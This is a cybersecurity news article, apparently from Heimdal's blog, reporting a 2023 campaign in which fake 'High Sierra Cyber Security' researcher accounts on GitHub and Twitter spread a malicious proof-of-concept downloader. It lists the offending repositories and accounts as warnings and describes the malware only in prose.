Heimdal
article featured image

Contents:

Cybercriminals use fake accounts on Twitter and GitHub to spread fake proof-of-concept (PoC) exploits for zero-day vulnerabilities. They impersonate cybersecurity researchers to push Windows and Linux with malware.

How the Scam Works

These impersonators pretend to work at a fake cybersec company, named “High Sierra Cyber Security”, or even at well-known organizations. They create GitHub repositories, promoting them on Twitter to gain the victim’s trust. To appear legitimate, the fake accounts use a convincing profile photo.

They pretend to offer exploits for zero-day flaws in popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. Threat actors seem tenacious and open new accounts and repositories after the removal of the old ones.

Fake Security Researchers Deliver Malicious Zero-Day Exploits

Source

These GitHub repositories are malicious and should be avoided:

  1. github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
  2. github.com/MHadzicHSCS/Chrome-0-day
  3. github.com/GSandersonHSCS/discord-0-day-fix
  4. github.com/BAdithyaHSCS/Exchange-0-Day
  5. github.com/RShahHSCS/Discord-0-Day-Exploit
  6. github.com/DLandonHSCS/Discord-RCE
  7. github.com/SsankkarHSCS/Chromium-0-Day

Also, these Twitter accounts are fake:

  • twitter.com/AKuzmanHSCS
  • twitter.com/DLandonHSCS
  • twitter.com/GSandersonHSCS
  • twitter.com/MHadzicHSCS

The campaign targets cybersecurity researchers and companies that do vulnerability research. These fake accounts were first discovered by VulnCheck in May 2023.

Details About the Malware

The malicious load was a Python script (‘poc.py’) functioning as a malware downloader for Linux and Windows systems.

The script downloads a ZIP archive from an external URL to the victim’s computer depending on their operating system, with Linux users downloading ‘cveslinux.zip’ and Windows users receiving ‘cveswindows.zip.’

The malware is saved to the Windows %Temp% or the Linux /home/<username>/.local/share folders, extracted, and executed.

Source

Over 60% of antivirus engines on VirusTotal have identified the Windows binary (‘cves_windows.exe’) that is included in the ZIP. Only three scanners were able to detect the far stealthier Linux binary (‘cves_linux’).

Fake Security Researchers Deliver Malicious Zero-Day Exploits

Source

Although it’s unclear what type of malware carries, both executables install a TOR client with the Windows version showing some password-stealing trojan features.

Targeting Security Experts

This is not the first campaign of this kind. Lazarus, a North Korean state-sponsored group, launched a similar one in 2021. To target researchers with malware and zero-days, they developed false vulnerability researcher profiles on social media.

 More recently, academics found thousands of repositories on GitHub offering fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them infecting users with malware, malicious PowerShell, obfuscated info-stealer downloaders, Cobalt Strike droppers, and more.

Source

Threat actors can get vulnerability research that they can employ in their own assaults by focusing on the cybersecurity community. Furthermore, the malware may frequently grant initial access to a cybersecurity firm’s network, opening the door for additional data theft and extortion attempts.

If you liked this article, follow us on LinkedInTwitterFacebook, and YouTube for more cybersecurity news and topics.

Author Profile

Andreea Chebac

Digital Content Creator

Andreea is a digital content creator within Heimdal® with a great belief in the educational power of content.

CHECK OUR SUITE OF 11 CYBERSECURITY SOLUTIONS

SEE MORE